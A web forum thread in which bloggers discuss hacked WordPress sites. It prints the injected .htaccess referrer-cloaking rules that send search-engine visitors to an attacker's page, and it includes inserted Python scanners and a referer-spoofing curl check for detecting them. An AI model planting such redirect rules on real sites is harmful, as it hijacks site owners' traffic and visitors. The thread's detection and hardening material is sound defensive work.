WordPress Blogs Hacked

BlackBeret

A couple of my blogs got hacked. They entered the following code in a couple of places:

Code:
RewriteEngine On
Options +FollowSymlinks
RewriteBase /


RewriteCond %{HTTP_REFERER} .*google.* [OR] 
RewriteCond %{HTTP_REFERER} .*ask.* [OR] 
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] 
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR] 
RewriteCond %{HTTP_REFERER} .*msn.* [OR] 
RewriteCond %{HTTP_REFERER} .*netscape.* [OR] 
RewriteCond %{HTTP_REFERER} .*aol.* [OR] 
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] 
RewriteCond %{HTTP_REFERER} .*goto.* [OR] 
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] 
RewriteCond %{HTTP_REFERER} .*mamma.* [OR] 
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] 
RewriteCond %{HTTP_REFERER} .*lycos.* [OR] 
RewriteCond %{HTTP_REFERER} .*search.* [OR] 
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* 
RewriteRule ^(.*)$ http://xxxxxxxxxxxxxx.com/v-web/index2.html [R=301,L]

ErrorDocument 401 http://xxxxxxxxxxxxxx.com/v-web/index2.html
ErrorDocument 403 http://xxxxxxxxxxxxxxx.com/v-web/index2.html
ErrorDocument 404 http://xxxxxxxxxxxxxxxx.com/v-web/index2.html
ErrorDocument 500 http://xxxxxxxxxxxxxxxxx.com/v-web/index2.html

The xxxxxxxxxxxxxxxxxxx is their domain name that I removed.

Most of the codes were in the wp-content folder and subfolders (plugins,themes).

I can't figure out what they are trying to do. It looks like they are trying to make a bunch of MFA sites with SE results. Or maybe redirect all the search engine traffic my site might have gotten to their site?

Any ideas?
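What the posted rules do is referrer cloaking: a visitor whose Referer header contains one of the listed search-engine names is 301-redirected to the attacker's page, while a direct visit (including the owner's own browsing) is served normally, and the absolute-URL ErrorDocument lines turn every 401/403/404/500 into an off-site redirect as well. As an added example, not code from the thread or from any poster, the Python below scans a WordPress tree for that pattern and emulates the condition chain to show which referers trigger it. The host names myblog.example and hijacker.example and both .htaccess samples are constructed placeholders.

```python
# Added example (not from the thread): find .htaccess referrer-cloaking redirects
# in a WordPress tree and emulate who they hit. myblog.example / hijacker.example
# are placeholder host names.
import os, re, shutil, tempfile

# Constructed sample: the posted rules, shortened, attacker domain replaced.
HIJACK_HTACCESS = """RewriteEngine On
Options +FollowSymlinks
RewriteBase /

RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://hijacker.example/v-web/index2.html [R=301,L]

ErrorDocument 404 http://hijacker.example/v-web/index2.html
"""
# Constructed sample: stock WordPress permalink rules, which must not be flagged.
CLEAN_HTACCESS = """RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
"""

COND_RE = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)(?:\s+\[([^\]]*)\])?', re.I)
RULE_RE = re.compile(r'^\s*RewriteRule\s+(\S+)\s+(\S+)', re.I)
ERRDOC_RE = re.compile(r'^\s*ErrorDocument\s+\d{3}\s+(https?://\S+)', re.I)

def offsite(url, own_hosts):
    """True if url is absolute and its host is not one of the site's own."""
    m = re.match(r'https?://([^/:]+)', url, re.I)
    return bool(m) and m.group(1).lower() not in own_hosts

def scan_htaccess_text(text, path, own_hosts):
    """Return (path, line, kind, target) for every suspicious directive."""
    findings, referer_cond_pending = [], False
    for n, line in enumerate(text.splitlines(), 1):
        if COND_RE.match(line):
            referer_cond_pending = True       # a Referer test guards the next rule
            continue
        m = RULE_RE.match(line)
        if m:
            if referer_cond_pending and offsite(m.group(2), own_hosts):
                findings.append((path, n, "referer-redirect", m.group(2)))
            referer_cond_pending = False
            continue
        m = ERRDOC_RE.match(line)
        if m and offsite(m.group(1), own_hosts):
            # An absolute URL makes Apache answer the error with an off-site redirect.
            findings.append((path, n, "errordocument-offsite", m.group(1)))
    return findings

def scan_tree(root, own_hosts):
    findings = []
    for dirpath, _, files in os.walk(root):
        if ".htaccess" in files:
            p = os.path.join(dirpath, ".htaccess")
            with open(p, encoding="utf-8", errors="replace") as fh:
                findings.extend(scan_htaccess_text(fh.read(), p, own_hosts))
    return findings

def would_redirect(text, referer, request_path="/"):
    """Emulate mod_rewrite for the first rule: [OR]-joined conditions form a
    group, groups are ANDed, patterns are unanchored regexes, case-sensitive
    unless [NC]. Returns the redirect target or None."""
    groups, current, rule = [], [], None
    for line in text.splitlines():
        m = COND_RE.match(line)
        if m:
            flags = (m.group(2) or "").upper().split(",")
            current.append((m.group(1), "NC" in flags))
            if "OR" not in flags:
                groups, current = groups + [current], []
            continue
        m = RULE_RE.match(line)
        if m:
            rule = (m.group(1), m.group(2))
            break
    if rule is None or not groups or not re.search(rule[0], request_path):
        return None
    for group in groups:
        if not any(re.search(p, referer, re.I if nc else 0) for p, nc in group):
            return None
    return rule[1]

def demo():
    """Scan a throwaway tree holding one clean and one hijacked .htaccess, then
    show which referers the hijack fires for."""
    root = tempfile.mkdtemp()
    try:
        plugin_dir = os.path.join(root, "wp-content", "plugins", "some-plugin")
        os.makedirs(plugin_dir)
        with open(os.path.join(root, ".htaccess"), "w") as fh:
            fh.write(CLEAN_HTACCESS)
        with open(os.path.join(plugin_dir, ".htaccess"), "w") as fh:
            fh.write(HIJACK_HTACCESS)
        hits = sorted((os.path.relpath(p, root).replace(os.sep, "/"), n, kind)
                      for p, n, kind, _ in scan_tree(root, {"myblog.example"}))
    finally:
        shutil.rmtree(root)
    referers = {
        "direct": "",                                         # owner typing the URL: untouched
        "google": "http://www.google.com/search?q=wordpress", # search visitor: hijacked
        "own search": "http://myblog.example/search/term",    # '.*search.*' also hits own pages
    }
    return hits, {k: would_redirect(HIJACK_HTACCESS, r) for k, r in referers.items()}
```

Two caveats: the emulation is deliberately simplified (no per-directory prefix handling, no backreferences), and legitimate hotlink-protection rules also test HTTP_REFERER, so treat findings as leads to review rather than something to delete blindly. To confirm a live site, request it with a spoofed referer and look for a 301 Location header, e.g. `curl -sI -e 'http://www.google.com/search?q=x' http://myblog.example/`.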
 
Is it these guys?
Code:
a3r0fl1ghttra1n1ng.c0m
 
It looks like it is telling spiders to rank his page instead of yours. Not sure though.
 
I just did a search in google for the following line:
Code:
.com/v-web/index2.html

trying to find more information and BlackHatWorld came up number one.

I thought stuff inside the code tags wasn't searchable by the search engines. Somebody might want to take a look at the board settings if it isn't supposed to be searchable.
 
Nice job Kreskin.

And how would you know that?

Haha. It's been a long time since I've seen someone use the name Kreskin in writing, but the Randal avatar sort of explains it.

Someone I know had an issue with the same thing, that's how I knew. Whoever is doing it started doing it a while ago.
 
How do you find such things in your blogs code? Are you using a software to scan the codes?
 
Maybe after he saw weird things happen in his blog he started to check the files.
You can use "Notepad++", its good software to search in many docs.
 
I was looking in the File Manager in my cPanel for something else and I noticed all these extra files. I started opening them to see what they were and you see what I found.

Another time I found someone had hacked by viewing my stats in cPanel. There were a lot of people landing on a page that I didn't make. Turned out to be a PayPal phishing scam, but I've had a couple of bank phishing scams also. Any time you see a landing page with the name of a bank in it in your stats it's probably a phish. It got so bad my host shut down a couple of my sites. Neither of us could figure out where they got in.
 
My blogs were hacked about a week ago; I found out the night before I had a flight scheduled so wasn't able to do anything about it.. wasn't for SE targeting, they plastered Xanax ads all over my site in the header, footer, sidebar, etc. They also replaced my adsense pub-id with theirs! Since I was about to go on vacation, I had a friend clean up my code for me since we share the server my sites are on.. I got excited when he called to tell me they had put their adsense ID in, but that quickly faded when he told me he forgot to save the hacked version of the site and had lost the hacker's info...

Good luck getting your blogs fixed and secured, I'm still trying to figure out how they got in. Several core PHP files in the wordpress install and some plugins were changed, but that still doesn't tell me how they did it.
 
I was on another forum the other day and the mod suggested this site. I don't know if it would help, it's a little beyond me. Good luck.

Code:
http://php-ids.org/


Welcome to the PHPIDS website!

On this site you can find a collection of resources relating to PHPIDS including files, documentation, a friendly forum and a cool demo that shows off some of the best features of PHPIDS.

PHPIDS (PHP-Intrusion Detection System) is a simple to use, well structured, fast and state-of-the-art security layer for your PHP based web application. The IDS neither strips, sanitizes nor filters any malicious input, it simply recognizes when an attacker tries to break your site and reacts in exactly the way you want it to. Based on a set of approved and heavily tested filter rules any attack is given a numerical impact rating which makes it easy to decide what kind of action should follow the hacking attempt. This could range from simple logging to sending out an emergency mail to the development team, displaying a warning message for the attacker or even ending the user's session.

PHPIDS enables you to see who's attacking your site and how and all without the tedious trawling of logfiles or searching hacker forums for your domain. Last but not least it's licensed under the LGPL!

Greetings and stay tuned...
The PHPIDS Team
 
damn... my blog got hacked too.. Completely wiped out.. nothing left..
thank god, i had a backup available...

*** Nick goes to unzip the backup ***

*** WTF?? Backup was not complete...!! And, he counts his losses ***

I lost my theme modifications, images inside posts, and what not.. thank god at least the database backup was complete or I was ruined....!! :D
 

Search results now show your post saying that the info inside [code] tags is searchable by search engines. Made me laugh!

Appreciate the link above as my site constantly seems to be attacked in some form or another
 
This is very scary. Does anyone want to investigate instead of only telling dramatic stories?

Which WP version and which plugins did you use?

Just to mention that... you also know... there are some (even popular) plugins which do nasty things.
 
WP 2.0.3 (haven't updated that site in a while!), and a friend who was looking at it for me while I was on vacation said the error was a security hole in the xmlrpc.php file.. I'm still not sure how that allowed the theme files to be edited, but I'm not much of a hacker (nor do I care to be).

edit: theme is Greenery v2, but I don't think the theme had anything to do with it because another blog on the same server was hacked and was running a totally different theme... and a different wp version as well.. (also out of date)

I'm going to be taking some steps to secure the site, and will roll those out to all of my other blogs as well.. starting with upgrading them all to WP 2.7...
 
bl4ck1ce, honestly you need to upgrade pronto. Wordpress has made significant changes since then.

Another thing (this goes for everyone): see if you have the following code in your theme's header.php and remove it. It serves no real purpose.. actually it does: it tells people what version of WordPress you are using, and if they care, they'd know the vulnerabilities that your blog is exposed to.
Code:
<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" />

btw. just change it in the 'Main Theme' and leave it elsewhere. Sorry about pointing it out, I have seen people just change all of 'em at one go with dreamweaver.

Cheers!!
 
Didn't realize you had specified the theme. I downloaded it and checked it. It does include the meta tag in the header.php on line 10 that I recommended for removal, hence it is responsible to a certain extent for the hacking. Just remove that piece of code.

Also, as I mentioned in the last post about also checking the footer.php, that obviously does not apply to the meta tag but rather to this part of the code:

PHP:
<?php bloginfo('version'); ?>

Hope this help!!

Cheers!!
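The two posts above are about the same thing: any theme file that prints bloginfo('version'), whether inside the generator meta tag in header.php or as plain text in footer.php, hands a visitor the exact WordPress version to look up exploits for. As an added example, not code from the thread, any poster or the Greenery theme, the Python below walks a theme directory, reports every line that leaks the version, and produces a cleaned copy. The header.php and footer.php contents are constructed samples, not the real theme's files.

```python
# Added example (not from the thread): find theme files that print the WordPress
# version and produce a copy with those lines removed. The header.php/footer.php
# below are constructed samples, not the Greenery theme's files.
import os, re, shutil, tempfile

GENERATOR_META_RE = re.compile(r'<meta\s+name=["\']generator["\'][^>]*>', re.I)
VERSION_CALL_RE = re.compile(r"<\?php\s+bloginfo\(\s*['\"]version['\"]\s*\)\s*;?\s*\?>", re.I)

SAMPLE_HEADER_PHP = """<!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<title><?php wp_title(); ?></title>
<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" />
<link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" />
<?php wp_head(); ?>
</head>
<body>
"""
SAMPLE_FOOTER_PHP = """<div id="footer">
<p>Powered by WordPress <?php bloginfo('version'); ?></p>
</div>
<?php wp_footer(); ?>
</body>
</html>
"""

def find_version_leaks(theme_dir):
    """Return (relative file, line number, stripped line) for each leaking line."""
    hits = []
    for dirpath, _, files in os.walk(theme_dir):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for n, line in enumerate(fh, 1):
                    if GENERATOR_META_RE.search(line) or VERSION_CALL_RE.search(line):
                        rel = os.path.relpath(path, theme_dir).replace(os.sep, "/")
                        hits.append((rel, n, line.strip()))
    return sorted(hits)

def strip_version_leaks(text):
    """Drop whole generator <meta> lines; blank out bare bloginfo('version') calls."""
    kept = []
    for line in text.splitlines(keepends=True):
        if GENERATOR_META_RE.search(line):
            continue
        kept.append(VERSION_CALL_RE.sub("", line))
    return "".join(kept)

def demo():
    """Write the two sample files to a throwaway theme dir, scan, clean, rescan."""
    samples = (("header.php", SAMPLE_HEADER_PHP), ("footer.php", SAMPLE_FOOTER_PHP))
    root = tempfile.mkdtemp()
    try:
        for name, body in samples:
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
        before = find_version_leaks(root)
        for name, body in samples:
            with open(os.path.join(root, name), "w") as fh:
                fh.write(strip_version_leaks(body))
        after = find_version_leaks(root)
    finally:
        shutil.rmtree(root)
    return before, after
```

One caveat for anyone following the upgrade advice above: from WordPress 2.5 on, core itself prints the generator meta tag through the wp_head hook (the wp_generator action), so once a site is upgraded the theme edit alone is not enough; adding `remove_action('wp_head', 'wp_generator');` to the theme's functions.php suppresses that copy too.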
 